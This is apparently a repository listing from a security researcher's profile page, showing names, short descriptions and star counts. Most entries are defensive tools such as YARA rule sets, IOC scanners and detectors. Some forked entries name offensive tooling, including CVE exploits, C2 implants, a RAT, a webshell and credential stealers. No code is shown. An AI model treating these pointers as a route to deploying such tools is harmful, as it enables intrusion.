18-day longest streak
-
Raccine ★ PINNED
A Simple Ransomware Vaccine
C++ ★ 978 2y agoExplain → -
signature-base ★ PINNED
YARA signature and IOC database for my scanners and tools
YARA ★ 3.0k 9d agoExplain → -
yarGen-Go ★ PINNED
A YARA rule generator
Go ★ 75 4mo agoExplain → -
Loki-RS ★ PINNED
🐍 High-performance, multi-threaded YARA & IOC scanner
Rust ★ 332 4d agoExplain → -
Loki
Loki - Simple IOC and YARA Scanner
Python ★ 3.8k 5mo agoExplain → -
auditd
Best Practice Auditd Configuration
Shell ★ 1.9k 1mo agoExplain → -
yarGen
yarGen is a generator for YARA rules
Python ★ 1.8k 5mo agoExplain → -
munin
Online hash checker for Virustotal and other services
Python ★ 853 1y agoExplain → -
Fenrir
Simple Bash IOC Scanner
Shell ★ 777 4y agoExplain → -
log4shell-detector
Detector for Log4Shell exploitation attempts
Python ★ 725 4y agoExplain → -
yarAnalyzer
Yara Rule Analyzer and Statistics
Python ★ 395 3y agoExplain → -
vti-dorks
Awesome VirusTotal Intelligence Search Queries
★ 332 3y agoExplain → -
Fnord
Pattern Extractor for Obfuscated Code
Shell ★ 302 4y agoExplain → -
BlueLedger
A list of my personal projects
★ 178 3y agoExplain → -
YARA-Performance-Guidelines
A guide on how to write fast and memory friendly YARA rules
★ 172 1y agoExplain → -
DLLRunner
Smart DLL execution for malware analysis in sandbox systems
Python ★ 145 11y agoExplain → -
god-mode-rules
God Mode Detection Rules
YARA ★ 134 1y agoExplain → -
yaraQA
YARA rule analyzer to improve rule quality and performance
Python ★ 117 22d agoExplain → -
evt2sigma
Log Entry to Sigma Rule Converter
Python ★ 107 4y agoExplain → -
mongobleed-detector
Detection Script for MongoBleed Exploitation
Shell ★ 80 5mo agoExplain → -
ImpHash-Generator
PE Import Hash Generator
Python ★ 79 9y agoExplain → -
Cyber-Search-Shortcuts
Browser Shortcuts for Cyber Security Related Online Services
★ 78 5y agoExplain → -
exotron
Sandbox feature upgrade with the help of wrapped samples
Python ★ 76 8y agoExplain → -
YARA-Style-Guide
A specification and style guide for YARA rules
★ 75 2y agoExplain → -
tiny-shells
All kinds of tiny shells
★ 65 3y agoExplain → -
panopticon
A YARA Rule Performance Measurement Tool
YARA ★ 64 2y agoExplain → -
Talks
Slides of my public talks
★ 63 4mo agoExplain → -
radiocarbon
Leak File Analyzer
Python ★ 63 8y agoExplain → -
Rewind
Immediate Virus Infection Counter Measures
C# ★ 63 5y agoExplain → -
LOLSecIssues
Cybersecurity's lighter side: a collection of the most amusing misunderstandings and missteps from newcomers to offensive security tools. A repository where naiveté in infosec is met with humor.
★ 58 2y agoExplain → -
ti-falsepositives
A collection of typical false positive indicators
Python ★ 56 5y agoExplain → -
xorex
XOR Key Extractor
Python ★ 51 1y agoExplain → -
webshell-intel
Scan web server for known webshell names and responses
★ 49 9y agoExplain → -
cyber-chef-recipes
Recipes for GCHQ's CyberChef Web App
★ 40 7y agoExplain → -
NoCat
A harmless Netcat-lookalike for detection testing. Simulates NC-style command-line flags and listener behavior without exposing a real backdoor or shell.
Go ★ 37 7mo agoExplain → -
littlesnitch-log-exporter
LittleSnitch Log Statistics Exporter
Python ★ 35 3y agoExplain → -
sysmon-version-history
An Inofficial Sysmon Version History (Change Log)
★ 33 5y agoExplain → -
awesome-yara ⑂
A curated list of awesome YARA rules, tools, and people.
★ 33 2y agoExplain → -
ThreatResearch-Reporting-Guide
Offensive Research Guide to Help Defense Improve Detection
★ 31 3y agoExplain → -
SkeletonKeyScanner
Scanner for the SkeletonKey Malware
Python ★ 30 11y agoExplain → -
prisma
Command Line STDOUT Colorer
Python ★ 30 4y agoExplain → -
notepad-plus-plus-hashes
Aggregated SHA-256 and SHA-1 checksums for Notepad++ release assets - collected from official GitHub release checksum files.
Python ★ 25 4mo agoExplain → -
ReginScanner
Scanner for Regin Virtual Filesystems
Python ★ 25 11y agoExplain → -
atomic-threat-coverage ⑂
Knowledge base of analytics designed to cover threats based on MITRE's ATT&CK.
Python ★ 23 7y agoExplain → -
BlueTeam-Tools ⑂
Tools and Techniques for Blue Team / Incident Response
★ 23 3y agoExplain → -
space-id
Invisible Watermarks with Space Characters in ASCII Files
Python ★ 21 8y agoExplain → -
IRNotes ⑂
Some IR notes
★ 17 10y agoExplain → -
neolog
Windows Syslog Command Line Client
★ 16 13y agoExplain → -
yara-uuid-generator
A tool that adds reproducible UUIDs to YARA rules
Python ★ 14 1mo agoExplain → -
narsil
Spy Agency Teasing
Python ★ 14 11y agoExplain → -
MineMock
A harmless cryptocurrency miner simulator for detection testing. Generates realistic mining-like artifacts without consuming resources or connecting to actual pools.
Go ★ 13 4mo agoExplain → -
YARA-rules ⑂
Some YARA rules i will add from time to time
YARA ★ 12 7y agoExplain → -
malware-signatures ⑂
Yara rules for malware families seen as part of targeted threats project
VimL ★ 11 10y agoExplain → -
WPWatcher
Wordpress Watcher is a wrapper for WPScan that manages scans on multiple sites and reports by email
Python ★ 11 6y agoExplain → -
yara ⑂
The pattern matching swiss knife
C ★ 10 5y agoExplain → -
defensive-project-ideas
Ideas for projects for defensive research or blue teaming
★ 10 3y agoExplain → -
rules ⑂
Repository of yara rules
★ 10 9y agoExplain → -
ssh-auditor ⑂
The best way to scan for weak ssh passwords on your network
Go ★ 10 7y agoExplain → -
Yara-Rules-5 ⑂
Repository of Yara Rules
★ 9 2y agoExplain → -
malware-ioc ⑂
Indicators of Compromises (IOC) of our various investigations
YARA ★ 9 5y agoExplain → -
Windows-Exploit-Suggester ⑂
This tool compares a targets patch levels against the Microsoft vulnerability database in order to detect potential missing patches on the target. It also notifies the user if there are public exploits and Metasploit modules available for the missing bulletins.
Python ★ 9 9y agoExplain → -
BlockWindows ⑂
Stop Windows 10 Nagging and Spying. Works with Win7-10
Batchfile ★ 9 10y agoExplain → -
pe-sieve ⑂
a small tool for investigating inline hooks (and other in-memory code patches)
C++ ★ 8 8y agoExplain → -
Yara-Rules-2 ⑂
Repository of YARA rules made by McAfee Enterprise ATR Team
★ 8 4y agoExplain → -
CredsSpreader
A tool to spread canary credentials in your organisation
★ 8 5y agoExplain → -
agile-hacking
Collection of hacks that make use of the least available on victim systems
Visual Basic ★ 8 9y agoExplain → -
moltbot-tui
A neon-drenched terminal UI for MoltBot with Tamagotchi vibes. Live monitoring, 10 themes, and a robot that talks back.
JavaScript ★ 7 4mo agoExplain → -
yara-rules-1 ⑂
No description.
★ 7 5y agoExplain → -
threat-intel ⑂
Signatures and IoCs from public Volexity blog posts.
Python ★ 7 4y agoExplain → -
pyattck ⑂
A Python package to interact with the Mitre ATT&CK Framework
★ 7 6y agoExplain → -
klara ⑂
Kaspersky's GReAT KLara
PHP ★ 7 8y agoExplain → -
plyara-1 ⑂
Parse YARA rules and operate over them more easily.
Python ★ 6 2y agoExplain → -
ATTACK-Python-Client ⑂
Python Script to access ATT&CK content available in STIX via a public TAXII server
★ 6 6y agoExplain → -
windows-privesc-check ⑂
Standalone Executable to Check for Simple Privilege Escalation Vectors on Windows Systems
Python ★ 6 11y agoExplain → -
malware-gems ⑂
A not so awesome list of malware gems for aspiring malware analysts
★ 6 4y agoExplain → -
splunk-addon-powershell ⑂
Splunk Add-on for PowerShell provides field extraction for PowerShell event logs.
★ 6 7y agoExplain → -
PowerMemory ⑂
Exploit the credentials present in files and memory
PowerShell ★ 6 10y agoExplain → -
nmap-nse-scripts ⑂
My collection of nmap NSE scripts
Lua ★ 6 9y agoExplain → -
grr ⑂
GRR Rapid Response: remote live forensics for incident response
Python ★ 6 7y agoExplain → -
sysmon-modular ⑂
A repository of sysmon configuration modules
★ 5 5y agoExplain → -
macguard-audit
Lightweight macOS baseline checks - collect config signals and send them as JSON to your SIEM
Shell ★ 5 4mo agoExplain → -
speedy
(Demo) - Only used to demonstrate a memory leak caused by Golang regexp
Go ★ 5 10y agoExplain → -
BloodHound ⑂
Six Degrees of Domain Admin
PowerShell ★ 5 8y agoExplain → -
alert_manager ⑂
Extended Splunk Alert Manager with advanced reporting on alerts, workflows (modify assignee, status, severity) and auto-resolve features
JavaScript ★ 5 11y agoExplain → -
PassTweaker
Tweaks password files to match modern password requirements
Python ★ 5 11y agoExplain → -
PyMISP ⑂
Python library using the MISP Rest API
Python ★ 5 7y agoExplain → -
PowerCat ⑂
A PowerShell TCP/IP swiss army knife.
PowerShell ★ 5 9y agoExplain → -
naive-bayes-classifier ⑂
yet another general purpose naive bayesian classifier.
Python ★ 5 7y agoExplain → -
language-thor
Syntax Theme for THOR APT Scanner log files
★ 5 7y agoExplain → -
DeleteShadowCopies ⑂
Deleting Shadow Copies In Pure C++
★ 4 3y agoExplain → -
DailyIOC ⑂
IOC from articles, tweets for archives
★ 4 2y agoExplain → -
cpython ⑂
The Python programming language
Python ★ 4 7y agoExplain → -
bfg ⑂
No description.
C ★ 4 7y agoExplain → -
laurel ⑂
Transform Linux Audit logs for SIEM usage
★ 4 4y agoExplain → -
harpoon ⑂
CLI tool for open source and threat intelligence
Python ★ 4 8y agoExplain → -
TheHive ⑂
TheHive: a Scalable, Open Source and Free Incident Response Platform
JavaScript ★ 4 9y agoExplain → -
ioc_signatures ⑂
No description.
★ 4 5y agoExplain → -
SunBurst_DGA_Decode ⑂
SunBurst DGA Decode Script
Python ★ 4 5y agoExplain → -
ShimCacheParser ⑂
No description.
Python ★ 4 10y agoExplain → -
pyminifier ⑂
Pyminifier is a Python code minifier, obfuscator, and compressor.
Python ★ 4 11y agoExplain → -
Misc-Windows-Hacking ⑂
Miscellaneous projects related to attacking Windows.
C++ ★ 4 11y agoExplain → -
Misc-PowerShell-Stuff ⑂
random powershell goodness
PowerShell ★ 4 9y agoExplain → -
doublepulsar-detection-script ⑂
A python2 script for sweeping a network to find windows systems compromised with the DOUBLEPULSAR implant.
Python ★ 4 9y agoExplain → -
virustotal-skill
AI agent skill for VirusTotal API v3 — query hashes, investigate IOCs, search VT Intelligence, and manage YARA Livehunt/Retrohunt
Shell ★ 3 4mo agoExplain → -
yargen-go-skill
AI agent skill to generate YARA rules from malware samples using yarGen-Go. Manages goodware databases, supports CLI and API for rule generation, and integrates with yarGen web server. Use when generating YARA rules, managing goodware databases, creating custom string/opcode databases, or interacting with yarGen web API.
Shell ★ 3 4mo agoExplain → -
detection-rules ⑂
Collection of my own detection rules
★ 3 5mo agoExplain → -
YARA_Rules ⑂
No description.
YARA ★ 3 3y agoExplain → -
Venom ⑂
Venom is a library that meant to perform evasive communication using stolen browser socket
★ 3 3y agoExplain → -
betterdefaultpasslist ⑂
No description.
★ 3 9y agoExplain → -
CVE-2019-19781 ⑂
Remote Code Execution Exploit for Citrix Application Delivery Controller and Citrix Gateway [ CVE-2019-19781 ]
★ 3 6y agoExplain → -
CVE-2018-0802 ⑂
PoC Exploit for CVE-2018-0802 (and optionally CVE-2017-11882)
Python ★ 3 8y agoExplain → -
Cortex-Analyzers ⑂
Cortex Analyzers Repository
Python ★ 3 5y agoExplain → -
asgard-playbooks ⑂
No description.
★ 3 4y agoExplain → -
NimPlant ⑂
A light-weight first-stage C2 implant written in Nim.
HTML ★ 3 3y agoExplain → -
mimipenguin ⑂
A tool to dump the login password from the current linux user
Shell ★ 3 9y agoExplain → -
loki-cloud
A flexible and lightweight way to execute LOKI on end systems
★ 3 3y agoExplain → -
TrustlookWannaCryToolkit ⑂
WannaCryToolkit scanner and removal toolkit
Python ★ 3 9y agoExplain → -
timebox ⑂
Divoom timebox CLI utility
Python ★ 3 8y agoExplain → -
RedPeanut ⑂
RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.
★ 3 6y agoExplain → -
pefile-go ⑂
Golang port of pefile
Python ★ 3 9y agoExplain → -
OTX-Python-SDK ⑂
Open Threat Exchange is an open community that allows participants to learn about the latest threats, research indicators of compromise observed in their environments, share threats they have identified, and automatically update their security infrastructure with the latest indicators to defend their environment.
Jupyter Notebook ★ 3 10y agoExplain → -
clawdbot ⑂
Your own personal AI assistant. Any OS. Any Platform. The lobster way. 🦞
TypeScript ★ 2 5mo agoExplain → -
plyara ⑂
Parse Yara rules and operate over them more easily.
Python ★ 2 9y agoExplain → -
CAPEv2 ⑂
Malware Configuration And Payload Extraction
Python ★ 2 1y agoExplain → -
icedid_analysis ⑂
This repository contains analysis scripts, YARA rules, and additional IoCs related to the blog post "Let’s set ice on fire: Hunting and detecting IcedID infections".
★ 2 4y agoExplain → -
Sigma_rules ⑂
Random sigma rules to share with the community
★ 2 3y agoExplain → -
100DaysOfYARA2023 ⑂
Rules Shared by the Community from 100 Days of YARA 2023
★ 2 3y agoExplain → -
detection-1 ⑂
Detection in the form of Yara, Snort and ClamAV signatures.
★ 2 2y agoExplain → -
CVE-2019-11510 ⑂
Exploit for Arbitrary File Read on Pulse Secure SSL VPN (CVE-2019-11510)
★ 2 6y agoExplain → -
dateparser ⑂
python parser for human readable dates
★ 2 2y agoExplain → -
Detection ⑂
No description.
★ 2 4y agoExplain → -
NimPackt-v1 ⑂
Nim-based assembly packer and shellcode loader for opsec & profit
★ 2 4y agoExplain → -
InfoSec-Black-Friday ⑂
All the deals for InfoSec related software/tools this Black Friday
★ 2 5y agoExplain → -
vulninfos ⑂
Information regarding publicly discussed vulnerabilities
★ 2 8y agoExplain → -
go-grr-apiclient ⑂
Golang API client for GRR Rapid Response
Protocol Buffer ★ 2 9y agoExplain → -
flowsynth ⑂
a network packet capture compiler
Python ★ 2 8y agoExplain → -
oxide ⑂
Cross-platform C2 implant framework. Every TTP ships with YARA rules, Sigma rules, and IR playbooks.
★ 1 1mo agoExplain → -
cve-2021-21985_exp ⑂
cve-2021-21985 exploit
★ 1 5y agoExplain → -
yarGen-dbs
Databases used in yarGen
★ 1 8mo agoExplain → -
thunderstorm-collector ⑂
THOR Thunderstorm Collectors
★ 1 6mo agoExplain → -
threat-team ⑂
IOCs from Google Threat Intelligence Group
YARA ★ 1 8mo agoExplain → -
KittyStager ⑂
KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant, called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.
★ 1 3y agoExplain → -
Detection-2 ⑂
No description.
★ 1 1y agoExplain → -
Yara-1 ⑂
No description.
YARA ★ 1 2y agoExplain → -
ALFA-SHELL-V2.5 ⑂
ALFA-SHELL-V2.5.3
PHP ★ 1 8y agoExplain → -
yara-rules-4 ⑂
Collection of YARA signatures from individual research
★ 1 2y agoExplain → -
wolf-tools ⑂
Tools and scripts by Arctic Wolf
★ 1 3y agoExplain → -
yara-rules-3 ⑂
A collection of my yara rules
★ 1 3y agoExplain → -
imphash-go
Imphash Generator
★ 1 9y agoExplain → -
go-yara ⑂
Go bindings for YARA
Go ★ 1 8y agoExplain → -
shellbags ⑂
Cross-platform, open-source shellbag parser
Python ★ 1 9y agoExplain → -
Tools ⑂
No description.
★ 0 2y agoExplain → -
Signatures ⑂
🚧 Currently transfering TLP:CLEAR rules from TLP:AMBER repository...
★ 0 3y agoExplain → -
GCTI ⑂
No description.
YARA ★ 0 3y agoExplain → -
protections-artifacts ⑂
Elastic Security detection content for Endpoint
★ 0 3y agoExplain → -
Koh ⑂
The Token Stealer
C# ★ 0 4y agoExplain →
No repos match these filters.